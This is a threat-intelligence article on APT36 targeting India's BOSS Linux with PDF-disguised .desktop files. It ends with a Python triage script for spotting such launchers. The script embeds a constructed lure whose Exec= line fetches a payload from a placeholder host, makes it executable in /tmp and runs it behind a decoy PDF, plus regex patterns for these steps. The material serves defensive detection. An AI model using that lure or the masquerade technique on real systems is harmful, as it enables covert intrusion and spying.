Pakistan-Linked Actors Target Indian Linux Operating System

A hacking group with ties to Pakistan is reportedly targeting Indian government systems that run a Linux-based operating system. The attackers lure government employees into opening files that look like legitimate PDFs; once opened, the files drop spyware that gives the hackers prolonged access to sensitive government information.
The threat actor is deploying malicious scripts on Bharat Operating System Solutions (BOSS), a Debian-based Linux distribution supported by the Indian government. The malicious files execute ELF binaries while displaying decoy documents, which cybersecurity firm Cyfirma, which reported the activity, describes as a strategic advance in the group's infiltration methods.
Identified as Transparent Tribe, also known as APT36 or Earth Karkaddan, the group has been active since at least 2013 and is known for cyberespionage operations that collect information of value to Pakistani military and diplomatic interests. In 2024, security company BlackBerry reported that the group was conducting extensive campaigns against government agencies and defense entities (see: Pakistani-Aligned APT36 Targets Indian Defense Organizations).
The initial intrusion typically relies on spear-phishing: the attackers send emails carrying compressed archives disguised as legitimate documents. Inside is a crafted .desktop file tailored to the BOSS operating system. When the file is opened, it runs a chain of commands that downloads an ELF binary to a temporary directory, marks it executable and runs it, while at the same time opening a decoy document in a browser such as Firefox to hide the malicious activity from the user.
On Linux desktops, .desktop files are normally harmless launchers: shortcuts that open an application or document, akin to Windows shortcut (.lnk) files. But the Exec= key runs whatever command the file specifies, the Name= and Icon= keys can make the launcher look like a PDF, and a copy placed in an autostart directory runs every time the user logs in, which raises the stakes for users who do not recognize what the file really is.
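The .desktop mechanics above lend themselves to a simple host-side triage check. The following Python script is an added example, not Cyfirma's analysis code or anything from the article: it parses a launcher's [Desktop Entry] group and flags the traits described in the text (a shell-wrapped Exec= line, a download-chmod-run chain staged in a temp directory, a PDF-looking Name=/Icon= paired with a non-viewer program, and placement in an autostart directory). The three sample launchers embedded in it are constructed for illustration; the hostname files.example.invalid, the file names and the paths are placeholders, not indicators from the campaign.

```python
"""Triage Linux .desktop launchers for the lure pattern described above.

Added example, not Cyfirma's or the article's code. The .desktop texts at
the bottom are constructed; the hostname, file names and paths in them are
placeholders, not campaign indicators.
"""
import configparser
import re

# Each rule maps to one thing the article says the lure does:
#   shell-wrapper        Exec= hands a command string to a shell instead of
#                        naming a program (needed to chain several steps)
#   download-chmod-exec  the chain fetches a file and marks it executable
#   tmp-staging          the payload is written to a world-writable temp dir
#   document-masquerade  Name=/Icon= claim a PDF while Exec= is not a viewer
#   autostart            the file sits in an autostart dir, so it runs at login
SHELL_RE = re.compile(r"(?:^|\s)(?:sh|bash|dash|zsh)\s+-c\b")
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")
TMP_RE = re.compile(r"/(?:tmp|var/tmp|dev/shm)/|\$\{?TMPDIR\}?")
DOC_NAME_RE = re.compile(r"\.pdf\b|application-pdf", re.I)
VIEWERS = {"evince", "okular", "atril", "xreader", "zathura", "xdg-open", "libreoffice"}
AUTOSTART_DIRS = ("/.config/autostart/", "/etc/xdg/autostart/")


def parse_desktop(text):
    """Parse freedesktop key=value groups; return the [Desktop Entry] group as a dict."""
    # interpolation=None keeps the %u / %f field codes literal; strict=False
    # tolerates duplicate keys, which real-world launchers sometimes contain.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # .desktop keys are case-sensitive
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        raise ValueError("no [Desktop Entry] group; not a launcher")
    return dict(cp["Desktop Entry"])


def triage(text, path=""):
    """Return the list of rule names that fire for one .desktop file.

    `path` is where the file was found; it is only used for the autostart rule.
    """
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    tokens = exec_line.split()
    program = tokens[0].rsplit("/", 1)[-1] if tokens else ""  # basename of the program
    hits = []
    if SHELL_RE.search(exec_line):
        hits.append("shell-wrapper")
    if FETCH_RE.search(exec_line) and CHMOD_RE.search(exec_line):
        hits.append("download-chmod-exec")
    if TMP_RE.search(exec_line):
        hits.append("tmp-staging")
    claims_doc = DOC_NAME_RE.search(entry.get("Name", "")) or DOC_NAME_RE.search(entry.get("Icon", ""))
    if claims_doc and program not in VIEWERS:
        hits.append("document-masquerade")
    if any(d in path for d in AUTOSTART_DIRS):
        hits.append("autostart")
    return hits


# Constructed lure in the shape the article describes: fetch an ELF into a
# temp dir, chmod it, run it in the background, open a decoy PDF in Firefox.
# Terminal=false keeps the shell from ever showing a window.
SAMPLE_LURE = """\
[Desktop Entry]
Type=Application
Name=Office_Circular_2025.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -fsSL -o /tmp/.x https://files.example.invalid/p; chmod +x /tmp/.x; /tmp/.x & firefox /tmp/decoy.pdf"
"""

# Constructed benign launchers: an application entry and a real document shortcut.
SAMPLE_BENIGN = """\
[Desktop Entry]
Type=Application
Name=Firefox Web Browser
Exec=firefox %u
Icon=firefox
Terminal=false
"""

SAMPLE_SHORTCUT = """\
[Desktop Entry]
Type=Application
Name=Report.pdf
Icon=application-pdf
Exec=xdg-open /home/user/Documents/Report.pdf
"""

if __name__ == "__main__":
    for label, text, path in (
        ("lure", SAMPLE_LURE, "/home/user/.config/autostart/update.desktop"),
        ("benign", SAMPLE_BENIGN, "/usr/share/applications/firefox.desktop"),
        ("shortcut", SAMPLE_SHORTCUT, "/home/user/Desktop/Report.pdf.desktop"),
    ):
        print(f"{label:9} {path}: {triage(text, path) or 'clean'}")
```

The rules are deliberately narrow. A legitimate document shortcut (Name=Report.pdf with Exec=xdg-open ...) passes, while a launcher that pretends to be a PDF yet hands control to bash, pulls a file into /tmp and chmods it trips four rules before the autostart location is even considered. On a fleet, the same function can be run over ~/.config/autostart, ~/Desktop and any extracted mail attachments, and a hit on download-chmod-exec alone is worth an analyst's look regardless of the other rules.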